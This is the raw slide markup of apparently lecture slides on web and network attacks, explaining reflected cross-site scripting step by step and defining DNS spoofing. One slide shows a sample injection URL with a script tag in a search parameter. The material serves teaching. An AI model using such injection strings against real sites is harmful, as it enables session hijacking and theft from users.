                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>link,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>effective.</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8331200" cy="492760"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6248400" cy="369570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>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13" name="object 13"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>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33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-87" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>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6" name="object 16"/>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7" name="object 17"/>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783" y="333396"/>
            <a:ext cx="4111413"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Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-120" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1932066" y="1440405"/>
            <a:ext cx="1998980" cy="2860887"/>
            <a:chOff x="1449049" y="1080303"/>
            <a:chExt cx="1499235" cy="2145665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>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000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>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000000"/>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2211882" y="1080303"/>
              <a:ext cx="736066" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>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8" name="object 8"/>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9" name="object 9"/>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10" name="object 10"/>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1" name="object 11"/>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2" name="object 12"/>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3" name="object 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2948466" y="2289284"/>
            <a:ext cx="4843780" cy="1014807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="662923" marR="1871933" indent="318339">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1. Send </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Email </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safebank.com/search.php?query=&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215228" y="3877902"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367131" y="4396783"/>
            <a:ext cx="2479885" cy="1191259"/>
            <a:chOff x="275348" y="3297587"/>
            <a:chExt cx="1859914" cy="893444"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275348" y="3297587"/>
              <a:ext cx="683679" cy="683672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="936193" y="3342475"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>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19" name="object 19"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="897636" y="3459480"/>
              <a:ext cx="1237487" cy="731519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482556"/>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21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482556"/>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22" name="object 22"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1053081" y="3707878"/>
              <a:ext cx="964691" cy="169163"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>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24" name="object 24"/>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25" name="object 25"/>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783" y="333396"/>
            <a:ext cx="4111413"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Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-120" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367132" y="1440405"/>
            <a:ext cx="10021145" cy="4147820"/>
            <a:chOff x="275348" y="1080303"/>
            <a:chExt cx="7515859" cy="3110865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2286000" y="3484879"/>
              <a:ext cx="4610735" cy="24130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4610734" h="24129">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4610481" y="23914"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6781832" y="3441515"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114934" h="133350">
                  <a:moveTo>
                    <a:pt x="698" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114642" y="67271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133350"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000"/>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6911421" y="2908426"/>
              <a:ext cx="879266" cy="1156931"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>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8" name="object 8"/>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9" name="object 9"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2211882" y="1080303"/>
              <a:ext cx="736066" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275348" y="3297587"/>
              <a:ext cx="683679" cy="683672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="936193" y="3342474"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>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13" name="object 13"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="897636" y="3459479"/>
              <a:ext cx="1237487" cy="731519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482555"/>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15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482555"/>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16" name="object 16"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1053081" y="3707878"/>
              <a:ext cx="964691" cy="169163"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3542644" y="4077319"/>
            <a:ext cx="4708313" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Click</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Link</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>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19" name="object 19"/>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20" name="object 20"/>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21" name="object 21"/>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22" name="object 22"/>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23" name="object 23"/>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25" name="object 25"/>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26" name="object 26"/>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27" name="object 27"/>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24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2948466" y="2289212"/>
            <a:ext cx="4843780" cy="1014807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="662923" marR="1871933"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safebank.com/search.php?query=&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="16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DNS Spoofing (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678729" y="1278117"/>
            <a:ext cx="11133057" cy="5078233"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hang on – how can a network attacker corrupt the DNS?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DNS Spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: </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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS spoofing occurs when an attacker (e.g., "Trudy") tricks a DNS resolver into accepting a fake response.</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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The fake response contains incorrect IP bindings (e.g., pointing a legitimate domain to a malicious server). </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65538" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2460008" y="3566342"/>
            <a:ext cx="6456527" cy="2589166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="AutoShape 3" descr="DNS Spoofing example">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A40DBEB-7EF9-3F40-FDE6-5872A190A5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5" descr="DNS Spoofing example">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4949B4A3-3B42-52B5-2468-C3CA18D652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AutoShape 7" descr="DNS Spoofing example">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A84C871-5241-51A3-0F82-B19C3106A81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9" name="AutoShape 9" descr="DNS Spoofing example">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B75D71DA-D908-768F-F850-B2793E187DA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99765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783" y="333396"/>
            <a:ext cx="4111413"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Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-120" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8579315" y="3046306"/>
            <a:ext cx="3261360" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="496134" marR="6773" indent="-480048">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server inserts malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
